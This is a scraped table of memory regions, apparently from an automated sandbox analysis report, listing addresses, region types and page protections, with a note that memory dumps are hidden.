||
|
4914000
|
trusted library allocation
|
page read and write
|
||
|
2ADC0FA2000
|
heap
|
page read and write
|
||
|
325A000
|
heap
|
page read and write
|
||
|
32ED000
|
heap
|
page read and write
|
||
|
1F3B9ACE000
|
trusted library allocation
|
page read and write
|
||
|
7E9D000
|
heap
|
page read and write
|
||
|
945000
|
unkown
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4DC0000
|
trusted library allocation
|
page read and write
|
||
|
20AF356A000
|
trusted library allocation
|
page read and write
|
||
|
9B15000
|
direct allocation
|
page execute and read and write
|
||
|
1F3B9ABE000
|
trusted library allocation
|
page read and write
|
||
|
E70000
|
unkown
|
page read and write
|
||
|
1F3B9800000
|
trusted library allocation
|
page read and write
|
||
|
BD0000
|
unkown
|
page readonly
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4DC0000
|
trusted library allocation
|
page read and write
|
||
|
3010000
|
heap
|
page read and write
|
||
|
20AFB76D000
|
heap
|
page read and write
|
||
|
2ADBF2B9000
|
heap
|
page read and write
|
||
|
32D8000
|
heap
|
page read and write
|
||
|
245C0000
|
direct allocation
|
page read and write
|
||
|
1F3B7C26000
|
system
|
page execute and read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
9115000
|
direct allocation
|
page execute and read and write
|
||
|
1080000
|
heap
|
page read and write
|
||
|
1F3B9770000
|
heap
|
page read and write
|
||
|
20AE3719000
|
trusted library allocation
|
page read and write
|
||
|
52C1000
|
trusted library allocation
|
page read and write
|
||
|
1F3B7DA0000
|
heap
|
page read and write
|
||
|
8CEF000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
947000
|
unkown
|
page readonly
|
||
|
8CE9000
|
heap
|
page read and write
|
||
|
3260000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2ADC0FA2000
|
heap
|
page read and write
|
||
|
BF0000
|
unkown
|
page readonly
|
||
|
1011000
|
unkown
|
page readonly
|
||
|
313E000
|
stack
|
page read and write
|
||
|
324F000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4A0B000
|
trusted library allocation
|
page read and write
|
||
|
FE8000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
32AE000
|
heap
|
page read and write
|
||
|
2ADC1280000
|
heap
|
page read and write
|
||
|
6DBE000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
8110000
|
heap
|
page read and write
|
||
|
7E8B000
|
heap
|
page read and write
|
||
|
8C70000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2417E000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
6EFD000
|
stack
|
page read and write
|
||
|
20AE19D0000
|
heap
|
page read and write
|
||
|
20AFB96E000
|
heap
|
page read and write
|
||
|
6D60000
|
direct allocation
|
page read and write
|
||
|
20AFB731000
|
heap
|
page read and write
|
||
|
80C0000
|
trusted library allocation
|
page read and write
|
||
|
20AE16AB000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4FFA000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
8080000
|
heap
|
page read and write
|
||
|
93E000
|
unkown
|
page readonly
|
||
|
2E12000
|
unkown
|
page read and write
|
||
|
8580000
|
trusted library allocation
|
page read and write
|
||
|
59DF000
|
stack
|
page read and write
|
||
|
7EB7000
|
heap
|
page read and write
|
||
|
2ADC0F9A000
|
heap
|
page read and write
|
||
|
37C02000
|
system
|
page read and write
|
||
|
2BC4000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
817C000
|
heap
|
page read and write
|
||
|
2ADBF31B000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
15F5E860000
|
heap
|
page read and write
|
||
|
3277000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
BE0000
|
unkown
|
page readonly
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
81C6000
|
heap
|
page read and write
|
||
|
24FD7000
|
unclassified section
|
page execute and read and write
|
||
|
2ADBF2B9000
|
heap
|
page read and write
|
||
|
2D10000
|
heap
|
page read and write
|
||
|
3314000
|
heap
|
page read and write
|
||
|
2ADC0FA2000
|
heap
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
2ADC0FA2000
|
heap
|
page read and write
|
||
|
2CF0000
|
heap
|
page read and write
|
||
|
2413D000
|
stack
|
page read and write
|
||
|
B9C000
|
stack
|
page read and write
|
||
|
73E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FAB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3230000
|
heap
|
page read and write
|
||
|
20AE502D000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AE503E000
|
trusted library allocation
|
page read and write
|
||
|
70FE000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
8BEE000
|
unkown
|
page read and write
|
||
|
2ADBF29D000
|
heap
|
page read and write
|
||
|
20AE16B9000
|
heap
|
page read and write
|
||
|
E5A000
|
stack
|
page read and write
|
||
|
8DAF000
|
stack
|
page read and write
|
||
|
BE0000
|
unkown
|
page readonly
|
||
|
8CD0000
|
heap
|
page read and write
|
||
|
2D20000
|
unkown
|
page readonly
|
||
|
3319000
|
heap
|
page read and write
|
||
|
FE0000
|
heap
|
page read and write
|
||
|
37C5C000
|
system
|
page read and write
|
||
|
2ADBF2B9000
|
heap
|
page read and write
|
||
|
41D5000
|
remote allocation
|
page execute and read and write
|
||
|
7E81000
|
heap
|
page read and write
|
||
|
A9A000
|
stack
|
page read and write
|
||
|
20AE1687000
|
heap
|
page read and write
|
||
|
71B1000
|
heap
|
page read and write
|
||
|
CFAE5FE000
|
stack
|
page read and write
|
||
|
2DA0000
|
trusted library allocation
|
page read and write
|
||
|
243B0000
|
remote allocation
|
page read and write
|
||
|
8DC0000
|
direct allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
BD0000
|
unkown
|
page readonly
|
||
|
2ADBF100000
|
heap
|
page read and write
|
||
|
5B1F000
|
stack
|
page read and write
|
||
|
3666000
|
unkown
|
page read and write
|
||
|
2DB0000
|
trusted library allocation
|
page read and write
|
||
|
6D269BE000
|
stack
|
page read and write
|
||
|
7580000
|
trusted library allocation
|
page read and write
|
||
|
6D40000
|
direct allocation
|
page read and write
|
||
|
34C0000
|
trusted library allocation
|
page read and write
|
||
|
F80000
|
unkown
|
page readonly
|
||
|
20AFB93B000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AFB794000
|
heap
|
page read and write
|
||
|
8AD5000
|
heap
|
page read and write
|
||
|
8A60000
|
heap
|
page readonly
|
||
|
2ADBF2CB000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
240BE000
|
stack
|
page read and write
|
||
|
CFAE8FF000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
8100000
|
trusted library allocation
|
page read and write
|
||
|
20AE3190000
|
heap
|
page execute and read and write
|
||
|
8AB0000
|
direct allocation
|
page read and write
|
||
|
32A9000
|
heap
|
page read and write
|
||
|
8AD0000
|
heap
|
page read and write
|
||
|
86C0000
|
direct allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2ADC0F91000
|
heap
|
page read and write
|
||
|
8DB0000
|
direct allocation
|
page read and write
|
||
|
24B62000
|
direct allocation
|
page execute and read and write
|
||
|
20AF3281000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AE371D000
|
trusted library allocation
|
page read and write
|
||
|
8670000
|
direct allocation
|
page read and write
|
||
|
80ED000
|
stack
|
page read and write
|
||
|
73F0000
|
trusted library allocation
|
page read and write
|
||
|
24652000
|
heap
|
page read and write
|
||
|
F5C000
|
stack
|
page read and write
|
||
|
3251000
|
heap
|
page read and write
|
||
|
30EC000
|
unkown
|
page read and write
|
||
|
5185000
|
trusted library allocation
|
page read and write
|
||
|
54BC000
|
unclassified section
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
C7D000
|
unkown
|
page read and write
|
||
|
7E97000
|
heap
|
page read and write
|
||
|
6C2E000
|
stack
|
page read and write
|
||
|
3510000
|
heap
|
page read and write
|
||
|
25A49000
|
unclassified section
|
page execute and read and write
|
||
|
812E000
|
stack
|
page read and write
|
||
|
1F3B95F0000
|
trusted library allocation
|
page read and write
|
||
|
3034000
|
heap
|
page read and write
|
||
|
7E95000
|
heap
|
page read and write
|
||
|
10E8000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AE3307000
|
trusted library allocation
|
page read and write
|
||
|
CC5F9FE000
|
stack
|
page read and write
|
||
|
A20000
|
unkown
|
page readonly
|
||
|
8A70000
|
heap
|
page read and write
|
||
|
4CE5000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
8CD9000
|
heap
|
page read and write
|
||
|
23D00000
|
direct allocation
|
page read and write
|
||
|
6EBE000
|
stack
|
page read and write
|
||
|
20AE3E13000
|
trusted library allocation
|
page read and write
|
||
|
C315000
|
direct allocation
|
page execute and read and write
|
||
|
E00000
|
heap
|
page read and write
|
||
|
4EBE000
|
trusted library allocation
|
page read and write
|
||
|
81AE000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
244C0000
|
heap
|
page read and write
|
||
|
2ADBF2AF000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
1F3B7E24000
|
heap
|
page read and write
|
||
|
93E000
|
unkown
|
page readonly
|
||
|
58B1000
|
trusted library allocation
|
page read and write
|
||
|
20AE501B000
|
trusted library allocation
|
page read and write
|
||
|
E90000
|
unkown
|
page readonly
|
||
|
72F1000
|
heap
|
page read and write
|
||
|
2ADBF271000
|
heap
|
page read and write
|
||
|
4870000
|
heap
|
page execute and read and write
|
||
|
27B8000
|
stack
|
page read and write
|
||
|
2BDA000
|
heap
|
page read and write
|
||
|
46C0000
|
trusted library allocation
|
page read and write
|
||
|
243B0000
|
remote allocation
|
page read and write
|
||
|
561C000
|
stack
|
page read and write
|
||
|
2C5B000
|
system
|
page execute and read and write
|
||
|
A9A000
|
stack
|
page read and write
|
||
|
4FD9000
|
unkown
|
page execute and read and write
|
||
|
2ADBF21D000
|
heap
|
page read and write
|
||
|
4570000
|
trusted library allocation
|
page read and write
|
||
|
247A4000
|
heap
|
page read and write
|
||
|
FB0000
|
heap
|
page read and write
|
||
|
8C7A000
|
heap
|
page read and write
|
||
|
A30000
|
unkown
|
page readonly
|
||
|
8C6E000
|
stack
|
page read and write
|
||
|
486E000
|
stack
|
page read and write
|
||
|
8DE0000
|
direct allocation
|
page read and write
|
||
|
24600000
|
heap
|
page read and write
|
||
|
E00000
|
heap
|
page read and write
|
||
|
2E78000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
|
20AE4841000
|
trusted library allocation
|
page read and write
|
||
|
B915000
|
direct allocation
|
page execute and read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AFB97A000
|
heap
|
page read and write
|
||
|
20AE3DF7000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4C5B000
|
heap
|
page read and write
|
||
|
AF15000
|
direct allocation
|
page execute and read and write
|
||
|
331F000
|
heap
|
page read and write
|
||
|
51E2000
|
unclassified section
|
page read and write
|
||
|
325A000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2ADBF2CB000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
2DA4000
|
trusted library allocation
|
page read and write
|
||
|
2ADC0F91000
|
heap
|
page read and write
|
||
|
3248000
|
heap
|
page read and write
|
||
|
58BB000
|
trusted library allocation
|
page read and write
|
||
|
20AE16F3000
|
heap
|
page read and write
|
||
|
7EA9000
|
heap
|
page read and write
|
||
|
73D5000
|
remote allocation
|
page execute and read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7FFD9B967000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AE1660000
|
heap
|
page read and write
|
||
|
2D10000
|
heap
|
page read and write
|
||
|
58A4000
|
unclassified section
|
page read and write
|
||
|
EB15000
|
direct allocation
|
page execute and read and write
|
||
|
24AED000
|
direct allocation
|
page execute and read and write
|
||
|
2A4F000
|
heap
|
page read and write
|
||
|
8178000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
59D9000
|
unkown
|
page execute and read and write
|
||
|
8230000
|
heap
|
page read and write
|
||
|
2ADBF2B8000
|
heap
|
page read and write
|
||
|
2ADBF24F000
|
heap
|
page read and write
|
||
|
85BF000
|
stack
|
page read and write
|
||
|
931000
|
unkown
|
page execute read
|
||
|
E115000
|
direct allocation
|
page execute and read and write
|
||
|
2ADBF2F3000
|
heap
|
page read and write
|
||
|
F5C000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
23CF0000
|
direct allocation
|
page read and write
|
||
|
6D70000
|
direct allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2ADBF29C000
|
heap
|
page read and write
|
||
|
48A0000
|
heap
|
page read and write
|
||
|
2BC0000
|
heap
|
page read and write
|
||
|
931000
|
unkown
|
page execute read
|
||
|
BE0000
|
unkown
|
page readonly
|
||
|
249BE000
|
direct allocation
|
page execute and read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
10E0000
|
heap
|
page read and write
|
||
|
8130000
|
heap
|
page read and write
|
||
|
80B0000
|
trusted library allocation
|
page read and write
|
||
|
2430D000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2ADBF2CB000
|
heap
|
page read and write
|
||
|
945000
|
unkown
|
page read and write
|
||
|
931000
|
unkown
|
page execute read
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
8385000
|
trusted library allocation
|
page read and write
|
||
|
32CE000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
2C4B000
|
system
|
page execute and read and write
|
||
|
20AFB7F2000
|
heap
|
page read and write
|
||
|
1080000
|
heap
|
page read and write
|
||
|
2A78000
|
heap
|
page read and write
|
||
|
760C000
|
stack
|
page read and write
|
||
|
2C00000
|
direct allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2ADC0FB2000
|
heap
|
page read and write
|
||
|
20AFB6D0000
|
heap
|
page read and write
|
||
|
5FD5000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
|
482F000
|
stack
|
page read and write
|
||
|
11E0000
|
unkown
|
page readonly
|
||
|
CFAEAFD000
|
stack
|
page read and write
|
||
|
2ADBF265000
|
heap
|
page read and write
|
||
|
FB0000
|
heap
|
page read and write
|
||
|
2ADC0FA2000
|
heap
|
page read and write
|
||
|
8DF0000
|
direct allocation
|
page read and write
|
||
|
2ADC1281000
|
heap
|
page read and write
|
||
|
7DD5000
|
remote allocation
|
page execute and read and write
|
||
|
8170000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
816F000
|
stack
|
page read and write
|
||
|
A10000
|
unkown
|
page readonly
|
||
|
6D262FF000
|
stack
|
page read and write
|
||
|
2ADBF29A000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
947000
|
unkown
|
page readonly
|
||
|
2ADBF218000
|
heap
|
page read and write
|
||
|
30BE000
|
stack
|
page read and write
|
||
|
1020000
|
unkown
|
page read and write
|
||
|
51E4000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2ADBF2A6000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4630000
|
heap
|
page readonly
|
||
|
87D5000
|
remote allocation
|
page execute and read and write
|
||
|
E5A000
|
stack
|
page read and write
|
||
|
F80000
|
unkown
|
page readonly
|
||
|
2BBD000
|
stack
|
page read and write
|
||
|
FE8000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
32C1000
|
heap
|
page read and write
|
||
|
20AE15F0000
|
heap
|
page read and write
|
||
|
8070000
|
trusted library allocation
|
page execute and read and write
|
||
|
46D9000
|
heap
|
page read and write
|
||
|
26449000
|
unclassified section
|
page execute and read and write
|
||
|
717E000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2D20000
|
unkown
|
page readonly
|
||
|
2ADBF2AF000
|
heap
|
page read and write
|
||
|
15F5E570000
|
heap
|
page read and write
|
||
|
72ED000
|
heap
|
page read and write
|
||
|
6D2758B000
|
stack
|
page read and write
|
||
|
24677000
|
heap
|
page read and write
|
||
|
32BB000
|
heap
|
page read and write
|
||
|
3167000
|
unkown
|
page execute and read and write
|
||
|
2ADC0F97000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
2CEE000
|
stack
|
page read and write
|
||
|
20AE3E41000
|
trusted library allocation
|
page read and write
|
||
|
930000
|
unkown
|
page readonly
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2ADC0FB2000
|
heap
|
page read and write
|
||
|
1000000
|
unkown
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
1F3B95F0000
|
trusted library allocation
|
page read and write
|
||
|
2ADC0F94000
|
heap
|
page read and write
|
||
|
FA0000
|
unkown
|
page readonly
|
||
|
4F1D000
|
trusted library allocation
|
page read and write
|
||
|
6D267B7000
|
stack
|
page read and write
|
||
|
3034000
|
heap
|
page read and write
|
||
|
73D0000
|
trusted library allocation
|
page read and write
|
||
|
2ADC0F91000
|
heap
|
page read and write
|
||
|
20AFB733000
|
heap
|
page read and write
|
||
|
38204000
|
system
|
page read and write
|
||
|
324F000
|
heap
|
page read and write
|
||
|
34D4000
|
unkown
|
page read and write
|
||
|
2ADBF2DC000
|
heap
|
page read and write
|
||
|
20AE16CB000
|
heap
|
page read and write
|
||
|
6D25F53000
|
stack
|
page read and write
|
||
|
3238000
|
heap
|
page read and write
|
||
|
2ADBF279000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7DF45A830000
|
trusted library allocation
|
page execute and read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7EBE000
|
heap
|
page read and write
|
||
|
2BC4000
|
heap
|
page read and write
|
||
|
743E000
|
stack
|
page read and write
|
||
|
1F3B9AB2000
|
trusted library allocation
|
page read and write
|
||
|
37E1C000
|
system
|
page read and write
|
||
|
713E000
|
stack
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4D20000
|
trusted library allocation
|
page execute and read and write
|
||
|
FFB000
|
unkown
|
page read and write
|
||
|
2ADBF28F000
|
heap
|
page read and write
|
||
|
20AE48C7000
|
trusted library allocation
|
page read and write
|
||
|
2D80000
|
trusted library section
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
EB0000
|
heap
|
page read and write
|
||
|
815F000
|
heap
|
page read and write
|
||
|
4E0E000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
8CEB000
|
heap
|
page read and write
|
||
|
5243000
|
trusted library allocation
|
page read and write
|
||
|
7EC1000
|
heap
|
page read and write
|
||
|
1000000
|
unkown
|
page read and write
|
||
|
20AE16A8000
|
heap
|
page read and write
|
||
|
852E000
|
stack
|
page read and write
|
||
|
1F3B7E1D000
|
heap
|
page read and write
|
||
|
20AE3701000
|
trusted library allocation
|
page read and write
|
||
|
20AE3160000
|
heap
|
page execute and read and write
|
||
|
1F3B9921000
|
trusted library allocation
|
page read and write
|
||
|
822E000
|
stack
|
page read and write
|
||
|
58D9000
|
trusted library allocation
|
page read and write
|
||
|
241BE000
|
stack
|
page read and write
|
||
|
2ADBF2F7000
|
heap
|
page read and write
|
||
|
2ADBF2DC000
|
heap
|
page read and write
|
||
|
32B8000
|
heap
|
page read and write
|
||
|
2ADBF29E000
|
heap
|
page read and write
|
||
|
8FC0000
|
direct allocation
|
page execute and read and write
|
||
|
CFAEDFC000
|
stack
|
page read and write
|
||
|
5078000
|
trusted library allocation
|
page read and write
|
||
|
8090000
|
trusted library allocation
|
page read and write
|
||
|
2E3B000
|
stack
|
page read and write
|
||
|
6D2693F000
|
stack
|
page read and write
|
||
|
20AE16B3000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
47EE000
|
stack
|
page read and write
|
||
|
2ADBF2AF000
|
heap
|
page read and write
|
||
|
2ADBF210000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2DCC000
|
heap
|
page read and write
|
||
|
4DC0000
|
trusted library allocation
|
page read and write
|
||
|
20AE5029000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AE5003000
|
trusted library allocation
|
page read and write
|
||
|
FFE000
|
unkown
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2ADBF296000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
32FB000
|
heap
|
page read and write
|
||
|
330E000
|
heap
|
page read and write
|
||
|
331D000
|
heap
|
page read and write
|
||
|
20AE3E30000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
80A0000
|
trusted library allocation
|
page read and write
|
||
|
7388000
|
heap
|
page read and write
|
||
|
4B72FF000
|
stack
|
page read and write
|
||
|
20AFB6D6000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AE3166000
|
heap
|
page execute and read and write
|
||
|
30FE000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
1011000
|
unkown
|
page readonly
|
||
|
1F3B7E01000
|
heap
|
page read and write
|
||
|
24815000
|
heap
|
page read and write
|
||
|
6D2647E000
|
stack
|
page read and write
|
||
|
4FBD000
|
direct allocation
|
page execute and read and write
|
||
|
2ADBF295000
|
heap
|
page read and write
|
||
|
1740000
|
unkown
|
page readonly
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
10FF000
|
heap
|
page read and write
|
||
|
20AE16B7000
|
heap
|
page read and write
|
||
|
73B0000
|
heap
|
page execute and read and write
|
||
|
6E3D000
|
stack
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
2ADBF220000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
10B0000
|
unkown
|
page read and write
|
||
|
2D70000
|
trusted library section
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
7560000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
|
2447C000
|
stack
|
page read and write
|
||
|
20AE16B1000
|
heap
|
page read and write
|
||
|
8CD1000
|
heap
|
page read and write
|
||
|
4E83000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
8590000
|
trusted library allocation
|
page read and write
|
||
|
CFAE1A9000
|
stack
|
page read and write
|
||
|
2ADBF215000
|
heap
|
page read and write
|
||
|
1570000
|
unkown
|
page readonly
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AE3270000
|
heap
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7E90000
|
heap
|
page read and write
|
||
|
462F000
|
stack
|
page read and write
|
||
|
2ADBF24F000
|
heap
|
page read and write
|
||
|
8137000
|
heap
|
page read and write
|
||
|
2ADBF21D000
|
heap
|
page read and write
|
||
|
55D5000
|
remote allocation
|
page execute and read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
8CEB000
|
heap
|
page read and write
|
||
|
2A30000
|
heap
|
page read and write
|
||
|
2ADBF2E6000
|
heap
|
page read and write
|
||
|
CC601FF000
|
stack
|
page read and write
|
||
|
2ADBF2C7000
|
heap
|
page read and write
|
||
|
2ADC1289000
|
heap
|
page read and write
|
||
|
CFAE7FF000
|
stack
|
page read and write
|
There are 1050 hidden memdumps, click here to show them.